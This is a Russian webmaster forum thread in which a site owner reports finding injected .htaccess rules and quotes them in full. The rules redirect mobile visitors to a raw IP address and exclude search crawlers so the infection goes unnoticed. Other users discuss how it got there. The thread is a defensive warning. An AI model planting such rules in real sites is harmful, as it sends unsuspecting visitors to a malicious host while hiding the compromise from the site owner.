Форум Не про работу Самое разное

Редирект на вирусный сайт через .htaccess

LIN
На сайте с 22.04.2006
Offline
114
LIN
862

Совершенно случайно обнаружил на одном из своих сайтов следующий код в .htaccess 

RewriteEngine   on

RewriteCond    %{HTTP_USER_AGENT}  (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone)  [NC]

RewriteCond    %{HTTP_USER_AGENT}  !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer)    [NC]

RewriteRule    (.*)    http://62.109.27.158/?8    [L,R=302]

Задумка автора кода интересна: владелец сайта может не заметить подобного взлома довольно продолжительное время.

Вобщем, если вас когда-то ломали, рекомендую проверить свой .htaccess

R
На сайте с 24.01.2008
Offline
180
Алексей
#1

Данный вид перенаправления трафа существует уже давно, вы задайтесь вопросом как вам это вставили?

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
D
На сайте с 31.07.2006
Offline
70
drop
#2

вчера у себя обнаружил, увы по логам на сервере не могу найти каким макаром это сделали.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий